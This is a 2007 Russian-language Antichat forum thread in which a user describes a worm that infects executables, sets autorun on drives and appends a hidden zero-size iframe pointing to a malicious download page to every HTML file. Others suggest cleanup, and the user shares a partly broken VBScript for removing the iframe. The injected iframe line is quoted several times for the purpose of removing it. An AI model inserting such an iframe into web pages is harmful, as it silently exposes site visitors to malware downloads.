Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Windows (https://forum.antichat.xyz/forumdisplay.php?f=42)
-   -   Вирь Win32:Agent-ITS (https://forum.antichat.xyz/showthread.php?t=47203)

Dimi4 20.08.2007 22:17
Вирь Win32:Agent-ITS
 
Вот попалса такой червяк.
Поставил автозапуск себе [setup.exe] на все локальные диски....Заражает exe. Сидит в памяти..
Я убил процес..потом del ето вирь..но не ето главное.
А Ищо копируетс в %windir%/system32/drivers/spoclsv.exe
Блин..но он заражает все html
т.к все html у меня зараж.
Он дописует в конце
PHP код:
<iframe src="http://[COLOR=Red]ww[/COLOR].viph.net/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe
Что ето за ссылка?
И есть прога которая находила все *.htm\*.html и удаляла етот кусок?
----------------------
сенк всем заранее

Zolden 20.08.2007 22:34
Если не ошибаюсь, это вирь с автозаливом, или что о в этом роде... Его можно на сайтах поцепить.. сталкивался с таким червем... Лечить его не охота, переустановлю винду.

GROB_T 20.08.2007 23:04
2 Dimi4, проги скорее всего нету, можешь сам написать, найди исходник программы для поиска файлов, а вырезание строки сам допиши

Dimi4 20.08.2007 23:12
Стясняюсь спросить:
На каком языке исходник искать а то я не очень-то кодер...
А может можна там VBs, Js через ActiveX?

Ni0x 20.08.2007 23:49
Цитата:
Если не ошибаюсь, это вирь с автозаливом, или что о в этом роде... Его можно на сайтах поцепить.. сталкивался с таким червем... Лечить его не охота, переустановлю винду.
Порадовало. Под автозаливом понимается автоматический слив денег со счета холдера на счет владельца трояна. Наверное ты имел ввиду автораспространение, зупачу к примеру.

GROB_T 21.08.2007 02:26
2 Dimi4, написать можно на чем угодно, если надо на vbs то на сайте wilderwind.narod.ru есть пример вируса на vbs, который сносит все незанятые другими приложениями файлы на диске, его вобщем нетрудно переделать под поиск html файлов и их лечение

Alexsize 21.08.2007 08:18
Пройдщись хорошенько обновленным антивирусом (нод32 советую) в SafeMode.
AVZ - неплохо детектит "хитрые" вирусы. Вкупе с НОДом он попалит большинство поползновений виря.
Порченных HTML вряд ли у тебя так уж и много, так что обойдись руками, так быстрее будет.
Еще лучше - переустанови винду. Вирмейкеры люди хитрые, может ты только верхушку айсберга видешь=)

Dimi4 21.08.2007 10:59
Цитата:
Порченных Html вряд ли у тебя так уж и много, так что обойдись руками, так быстрее будет.
Нет-уш...много у меня...
--------
нода нет..есть аваст.
Цитата:
Еще лучше - переустанови винду.
2дня назад переустанавлевал

Dimi4 21.08.2007 11:16
PHP код:
Set FSO CreateObject("Scripting.FileSystemObject")
Set wshshell createobject("WScript.Shell")
'
Set TheFolder = FSO.GetFolder("D:\")
TheExtension  = ".html"
TheExtension = UCase(TheExtension)
'
Sub WorkWithSubFolders(ByVal AFolderByVal TheExtension)
On Error Resume Next
Dim MoreFoldersTempFolder
Set  MoreFolders AFolder.SubFolders
For Each TempFolder In MoreFolders
WorkWithSubFolders TempFolderTheExtension
Next
End Sub
'
 Dim AFile, TheFiles
 On Error Resume Next
 Set TheFiles = AFolder.Files
 For Each AFile In TheFiles
 If UCase(FSO.GetExtensionName(AFile.Path)) = TheExtension Then
 '''
 dim oReg
 set oReg = New RegExp
 oReg.Global - true
 oReg.IgnoreCase true
 oReg.Pattern " <iframe src="http://ww.viph.net/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe> "
 txt oReg.Replace(txt" ")
 end if
 Next
 End Sub
 '
 WorkWithSubFolders TheFolder, TheExtension 
Такой скрипт подойдет?

GROB_T 27.08.2007 21:20
работать точно не будет из-за этой строки
PHP код:
oReg.Pattern " <iframe src="http://ww.viph.net/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe> " 
надо каждую кавычку заменить на две:

PHP код:
oReg.Pattern " <iframe src=""http://ww.viph.net/wuhan/down.htm"" width=""0"" height=""0"" frameborder=""0""> </iframe> " 


Время: 13:48